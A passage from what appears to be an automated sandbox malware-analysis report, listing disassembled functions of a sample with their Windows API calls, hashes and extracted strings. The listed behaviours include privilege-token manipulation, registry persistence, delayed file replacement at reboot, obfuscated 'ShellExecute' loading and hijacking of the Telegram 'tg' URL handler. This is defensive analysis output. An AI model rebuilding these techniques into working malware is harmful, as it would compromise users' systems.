                                • Instruction Fuzzy Hash: ECF169246083C18FD7199F2D85541B8FFE79B9A200718C4BFD8EA9BB72C539D648CB11
                                Function 0053F694 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0053F6D1
                                • GetVersionExW.KERNEL32(?), ref: 0053F6EA
                                  • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                  • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Exception@8H_prolog3ThrowVersion_memset
                                • String ID:
                                • API String ID: 3528868769-0
                                • Opcode ID: bb4b0a21f77405e7aad7009bfafbe27ad006e80440f775d425bc0c606da5e42c
                                • Instruction ID: 548b42f348a0f449726823fd30a8224a9d8712e144462dc49f3079fa8446a8b3
                                • Opcode Fuzzy Hash: bb4b0a21f77405e7aad7009bfafbe27ad006e80440f775d425bc0c606da5e42c
                                • Instruction Fuzzy Hash: BF019A3090020A8FDB68EF60D84ABD97BE4BF44704F4080A8E559D7291DF70AE898B91
                                Function 026D18A4 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D18DC
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AdjustPrivilegesToken
                                • String ID:
                                • API String ID: 2874748243-0
                                • Opcode ID: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                • Instruction ID: fc47bf82c0c6f434f0f92b0e24093c61dc8027623b4fefc624691e054b286679
                                • Opcode Fuzzy Hash: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                • Instruction Fuzzy Hash: BEF0A2B490020DAFE700DF94C885ABE7BF9FB48304F508559E9059B255D7B09A448B95
                                Function 100018A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AdjustPrivilegesToken
                                • String ID:
                                • API String ID: 2874748243-0
                                • Opcode ID: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                • Instruction ID: 53143a0ca8482a000d6b4ded4d2d76efb65c21e66b1d3043b1fae087c7fd42a3
                                • Opcode Fuzzy Hash: 49a4f8c54fe8e2f2a6b124dc8d7b4ece089099274bdccf730c0a628917e12220
                                • Instruction Fuzzy Hash: 12F0A2B4900209AFE700DF54C885ABE7BF9FB48304F508559F9059B251D770AA448B95
                                Function 100064E1 Relevance: .7, Instructions: 662COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 236fcac6909d5ac101f5923424f6bd85ee021b03b22395ccb9aee7a78b155344
                                • Instruction ID: 58baf52ab414309b9a3ea0f61b752d29b463db910e412ab107bc22ed908344b9
                                • Opcode Fuzzy Hash: 236fcac6909d5ac101f5923424f6bd85ee021b03b22395ccb9aee7a78b155344
                                • Instruction Fuzzy Hash: F2521B71D00215DFDB54CF98C9946ADBBF2FF08355F2081AAE855AB749D730AA90CF90
                                Function 00406620 Relevance: .4, Instructions: 360COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1a07c49bd521d1946f3e6d7c8c226990916c89b00e7ef3d68ed55a195e7043c0
                                • Instruction ID: 2a9ad5a725541caab808e8af4279b1112c1507681ada8129af866ecbcf07f026
                                • Opcode Fuzzy Hash: 1a07c49bd521d1946f3e6d7c8c226990916c89b00e7ef3d68ed55a195e7043c0
                                • Instruction Fuzzy Hash: 2CD1C5B1A001468FEB48EFB8DCC161E7BE4AB48314F14C57DD21AE73A2DA3C98559B58
                                Function 026D6CE5 Relevance: .3, Instructions: 339COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                • Instruction ID: 23da95ec23d3b5bf64ffd32e071a838d3de2a57cacd1642b7f0fffec5b7f50fb
                                • Opcode Fuzzy Hash: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                • Instruction Fuzzy Hash: 1DF1E471E002298FDB25CF68D890B9DB7B2BB89314F1581EAC94DA7345D7306E86CF91
                                Function 10006CE1 Relevance: .3, Instructions: 339COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                • Instruction ID: 8878bc799d59d7e9578ae9d63681dd266ae9f1cb07bf584380dc3f1bcb52fe03
                                • Opcode Fuzzy Hash: baf92ad4b0be72b0ed09fe48251c72f10c975de6cad161269829640e85e1453f
                                • Instruction Fuzzy Hash: 95F1D475E002298FEB64CF28C89079DB7B2FB49354F2581EAC94DA7245D7306E85CF91
                                Function 0040FBE0 Relevance: .3, Instructions: 271COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03b6b03b444c7866010a6310b5ae6a3536366f016b7d220786da7b711e854cd2
                                • Instruction ID: 3b0e4233a0f6d3722b550b4edc18e3a04d79d08a4da01d5b273284f1e8e13640
                                • Opcode Fuzzy Hash: 03b6b03b444c7866010a6310b5ae6a3536366f016b7d220786da7b711e854cd2
                                • Instruction Fuzzy Hash: 4291B275B001099FCB18CE6DDC81A9AB7E6EF88350F14813AF805EB395E635DD45CB94
                                Function 0040FCFC Relevance: .1, Instructions: 102COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 50b29fc598e7515b3ee8c3c8e8de6777b75a24a7ca8a6c32a1a8954fa9303b85
                                • Instruction ID: b92d426b2840306fbefbbf60bfa8ebbad3725dea671ea216cfdb1569fb70fe05
                                • Opcode Fuzzy Hash: 50b29fc598e7515b3ee8c3c8e8de6777b75a24a7ca8a6c32a1a8954fa9303b85
                                • Instruction Fuzzy Hash: ED31AF75B0001ACFC7288E3A9D52159BA96AF88380B15C137E806DF7A5E635CD19ABC5
                                Function 026D0B11 Relevance: .1, Instructions: 87COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                • Instruction ID: 501bc0fccd06a213f69ced27336d0c3a90f8dff1ab538913c5a8f406478aeae4
                                • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                • Instruction Fuzzy Hash: 8D319A36A0874B8FC314DF18C48092AB7E4FF89318F09096DE89597312E375F959CBA1
                                Function 026DC144 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 47587f165342afe35fd6f0d22230d0b2b0eb5fde4c1784d217074d4fdece1a69
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: 3F1157B7B4007D53E6088A3DCCB46B7B396EBE5228B3C437BE042CB758D722A146D600
                                Function 1000C140 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 7c9983c2d51c321497ce142cda71ccfcb264f17f5177ddff9d9bdbede1d68c43
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: AE119EB724438A43F280CB3DD8B4DEBA3DAEBC71E07294375D0438B65ED13295059500
                                Function 026D7680 Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                • Instruction ID: 5ac48a6f4613051b598d469ae7aa227edeed917c3b7a12a37ffe4243c2d9066d
                                • Opcode Fuzzy Hash: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                • Instruction Fuzzy Hash: 4321C321AB0AFA07CB458BFCECC061367D18BCA1163ADC366DA64C9151D1BDD272C660
                                Function 1000767C Relevance: .1, Instructions: 74COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                • Instruction ID: af8dc597f677515c84aaa7c1ca680f8a378724b7035fa932a96d9af2bafa269f
                                • Opcode Fuzzy Hash: 8309f7664a9dcc2b9c0cf34492782753835e12f7578b447de968111577be4c28
                                • Instruction Fuzzy Hash: 8A21D821A74AF607D7448BFCECC051327D1DB8915636DC367DA64C9051D0BED672C550
                                Function 10001144 Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 338registryCOMMON
                                Download Yara Rule
                                APIs
                                • _wprintf.LIBCMT ref: 10001192
                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,1001A5D4,0000000A), ref: 100011B0
                                • RegCloseKey.ADVAPI32(?), ref: 100011C0
                                • _memset.LIBCMT ref: 100012B7
                                • RegCloseKey.ADVAPI32(?), ref: 100012EE
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 100012FF
                                • _memset.LIBCMT ref: 10001318
                                • _sprintf.LIBCMT ref: 100013C3
                                • _memset.LIBCMT ref: 10001471
                                • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 10001496
                                • _sprintf.LIBCMT ref: 100014B7
                                • RegSetValueExA.ADVAPI32(?,1001A62C,00000000,00000001,?,?), ref: 100014E8
                                • _sprintf.LIBCMT ref: 10001509
                                • DefineDosDeviceA.KERNEL32(00000001,1001A62C,?), ref: 1000151B
                                • _memset.LIBCMT ref: 1000154C
                                • _sprintf.LIBCMT ref: 10001566
                                • _memset.LIBCMT ref: 100015A7
                                • _memset.LIBCMT ref: 100015BE
                                • _memset.LIBCMT ref: 10001619
                                • _memset.LIBCMT ref: 1000162D
                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000165A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$_sprintf$CloseValue$CreateDefineDeviceFileFolderMovePathSpecial_wprintf
                                • String ID: %s\1.qwq1$%s\Mic$.qwq$1$QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}$SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices$[:\1.qwq1$art Me$grams$nu\Pro$ows\St$rosoft\Wind
                                • API String ID: 1177859221-1427731300
                                • Opcode ID: 0b30ea9c887d113786127fb0fe131acf0ce7c388d6d05fd3aa7cff60e868827e
                                • Instruction ID: a6eba57ee7157bfdc474ef77063ead9024457ec1a50b4f639e4453205c2468a6
                                • Opcode Fuzzy Hash: 0b30ea9c887d113786127fb0fe131acf0ce7c388d6d05fd3aa7cff60e868827e
                                • Instruction Fuzzy Hash: 12D179B180126DAEEB21DF548D84FEAB7BDEB05380F0045E5E649AB105DA709FC58FA0
                                Function 100031C7 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 224libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100031EE
                                • _strrchr.LIBCMT ref: 100031FD
                                • _strncpy.LIBCMT ref: 100032A6
                                • _memset.LIBCMT ref: 100032D2
                                • _memset.LIBCMT ref: 10003344
                                • _sprintf.LIBCMT ref: 1000335E
                                  • Part of subcall function 10002F16: LoadLibraryA.KERNEL32(?,?), ref: 10002F6E
                                  • Part of subcall function 10002F16: GetProcAddress.KERNEL32(00000000), ref: 10002F75
                                • _memset.LIBCMT ref: 10003425
                                • _sprintf.LIBCMT ref: 10003438
                                  • Part of subcall function 1000AD50: __output_l.LIBCMT ref: 1000ADAB
                                • _memset.LIBCMT ref: 1000349D
                                • LoadLibraryA.KERNEL32(?,?,00000000,000000F3,?,?,?,?,?,00000000,000000D8,?,?,?,?,?), ref: 100034AC
                                • _memset.LIBCMT ref: 100034EC
                                • GetProcAddress.KERNEL32(?,?), ref: 10003501
                                • _memset.LIBCMT ref: 1000352A
                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,000000F1,?,?,?,?,?,00000000,000000D8), ref: 10003555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$Library$AddressLoadProc_sprintf$FileFreeModuleName__output_l_strncpy_strrchr
                                • String ID: %s\tg\shell\open\command$-- tg://setlanguage?lang=classic-zh-cn$A$Open$Shel$Shel$_Classes$cute$d$dll$l32.$lExe
                                • API String ID: 1778617766-3396513812
                                • Opcode ID: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                • Instruction ID: a1104d94dd440214b8363c757a0762cb0449f268d632bcc907b58f935efa182f
                                • Opcode Fuzzy Hash: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                • Instruction Fuzzy Hash: C79170B5C0426D9AEB22DF54CC81BEEB7BCEB04780F4081E5E608A6155D775AFC98F60
                                Function 026D31CB Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 224libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 026D31F2
                                • _strncpy.LIBCMT ref: 026D32AA
                                • _memset.LIBCMT ref: 026D32D6
                                • _memset.LIBCMT ref: 026D3348
                                • _sprintf.LIBCMT ref: 026D3362
                                  • Part of subcall function 026D2F1A: LoadLibraryA.KERNEL32(?,?), ref: 026D2F72
                                  • Part of subcall function 026D2F1A: GetProcAddress.KERNEL32(00000000), ref: 026D2F79
                                • _memset.LIBCMT ref: 026D3429
                                • _sprintf.LIBCMT ref: 026D343C
                                  • Part of subcall function 026DAD54: __output_l.LIBCMT ref: 026DADAF
                                • _memset.LIBCMT ref: 026D34A1
                                • LoadLibraryA.KERNEL32(?,?,00000000,000000F3,?,?,?,?,?,00000000,000000D8,?,?,?,?,?), ref: 026D34B0
                                • _memset.LIBCMT ref: 026D34F0
                                • GetProcAddress.KERNEL32(?,?), ref: 026D3505
                                • _memset.LIBCMT ref: 026D352E
                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,000000F1,?,?,?,?,?,00000000,000000D8), ref: 026D3559
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$Library$AddressLoadProc_sprintf$FileFreeModuleName__output_l_strncpy
                                • String ID: %s\tg\shell\open\command$-- tg://setlanguage?lang=classic-zh-cn$A$Open$Shel$Shel$_Classes$cute$d$dll$l32.$lExe
                                • API String ID: 41527467-3396513812
                                • Opcode ID: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                • Instruction ID: 405b4b644985ba483e83bd5aebceb146fc82971d3169b4e56297d712410f62c1
                                • Opcode Fuzzy Hash: de30c5cdb71a66d09e6c21ac387def07262357a523ce7049645e96b0468760d0
                                • Instruction Fuzzy Hash: A9918FB6C0426D9ADB21DF54CC81BEEB7BDEB04704F0081EAD608A6241D7749FC98F65
                                Function 026D4489 Relevance: 35.3, APIs: 12, Strings: 8, Instructions: 290registrysleeplibraryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 026D18EE: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D1BD1
                                  • Part of subcall function 026D18EE: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D1BEF
                                  • Part of subcall function 026D18EE: CloseHandle.KERNEL32(?), ref: 026D1BFC
                                  • Part of subcall function 026D18EE: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D1E69
                                  • Part of subcall function 026D18EE: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D1E87
                                  • Part of subcall function 026D18EE: CloseHandle.KERNEL32(?), ref: 026D1E94
                                  • Part of subcall function 026D18EE: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D2101
                                  • Part of subcall function 026D18EE: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D211F
                                  • Part of subcall function 026D18EE: CloseHandle.KERNEL32(?), ref: 026D212C
                                  • Part of subcall function 026D238C: __EH_prolog3_GS.LIBCMT ref: 026D2396
                                  • Part of subcall function 026D238C: VariantInit.OLEAUT32(?), ref: 026D23D8
                                  • Part of subcall function 026D238C: VariantInit.OLEAUT32(?), ref: 026D23F8
                                  • Part of subcall function 026D238C: VariantInit.OLEAUT32(?), ref: 026D2415
                                  • Part of subcall function 026D238C: VariantInit.OLEAUT32(?), ref: 026D2432
                                • Sleep.KERNEL32(?), ref: 026D44AF
                                • _memset.LIBCMT ref: 026D4B6A
                                • LoadLibraryA.KERNEL32(?), ref: 026D4B7A
                                • _memset.LIBCMT ref: 026D4BBB
                                • GetProcAddress.KERNEL32(00000000,?), ref: 026D4BCC
                                • _memset.LIBCMT ref: 026D4BF8
                                • GlobalAddAtomA.KERNEL32(?), ref: 026D46A5
                                  • Part of subcall function 026D31CB: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 026D31F2
                                  • Part of subcall function 026DBCB3: _doexit.LIBCMT ref: 026DBCBF
                                • RegOpenKeyExA.ADVAPI32(80000001,1001A800,?,000F003F,?), ref: 026D4C4C
                                • RegSetValueExA.ADVAPI32(?,1001A830,?,00000001,?,?,?,000F003F,?), ref: 026D4C7E
                                • RegCloseKey.ADVAPI32(?,?,00000001,?,?,?,000F003F,?), ref: 026D4C8A
                                • Sleep.KERNEL32(000003E8,?,000F003F,?), ref: 026D4CA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Open$Process$CloseInitVariant$HandleToken_memset$Sleep$AddressAtomFileGlobalH_prolog3_LibraryLoadModuleNameProcValue_doexit
                                • String ID: A$Open$Shel$Shel$cute$dll$l32.$lExe
                                • API String ID: 4017658669-3353880535
                                • Opcode ID: 443ede63e0b6c769290402c63a97ffb0f51e36b5d23ceb6d52c6dccf3bf0c9f7
                                • Instruction ID: 566386753a070731485ca64792095532a8705f54709a7079d8110c68e0d45fcb
                                • Opcode Fuzzy Hash: 443ede63e0b6c769290402c63a97ffb0f51e36b5d23ceb6d52c6dccf3bf0c9f7
                                • Instruction Fuzzy Hash: 0BA1417254C385AAE3209B60DC45F6F77E9EF84750F10481EF688CB2A0EBB19A44CB57
                                Function 00425480 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 313windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImagePixelFormat.GDIPLUS(?,?,00000000,00000000,0073BF7C), ref: 004254AC
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 0042552D
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 00425555
                                • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,00000000,00000000,?), ref: 004255B6
                                • _malloc.LIBCMT ref: 004255F7
                                  • Part of subcall function 0063A2D7: __FF_MSGBANNER.LIBCMT ref: 0063A2F0
                                  • Part of subcall function 0063A2D7: __NMSG_WRITE.LIBCMT ref: 0063A2F7
                                  • Part of subcall function 0063A2D7: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00646709,00000000,00000001,00000000,?,00649909,00000018,0071ACE0,0000000C,00649999), ref: 0063A31C
                                • _free.LIBCMT ref: 0042563F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: GdipImage$AllocateFormatHeapHeightPalettePixelSizeWidth_free_malloc
                                • String ID: &
                                • API String ID: 4101255611-3042966939
                                • Opcode ID: dc5093ca38ae2d5387a9d4564f6f30686d87e2b50f3620c683253e88f8e2b187
                                • Instruction ID: da598ec3ef59f7b05732924bef539a40e6e40d994cf5092463715e4a608f0960
                                • Opcode Fuzzy Hash: dc5093ca38ae2d5387a9d4564f6f30686d87e2b50f3620c683253e88f8e2b187
                                • Instruction Fuzzy Hash: 59D173B1A006299FDB20DF54DC80BAAB7B5FF48304F8085ADE60997241D774AEC5CF99
                                Function 026D4AA9 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 141registrysleeplibraryCOMMON
                                Download Yara Rule
                                APIs
                                • FindWindowExA.USER32(?,?,?), ref: 026D4ABA
                                • Sleep.KERNEL32(?,?,?,?), ref: 026D4AEB
                                • _memset.LIBCMT ref: 026D4B6A
                                • LoadLibraryA.KERNEL32(?), ref: 026D4B7A
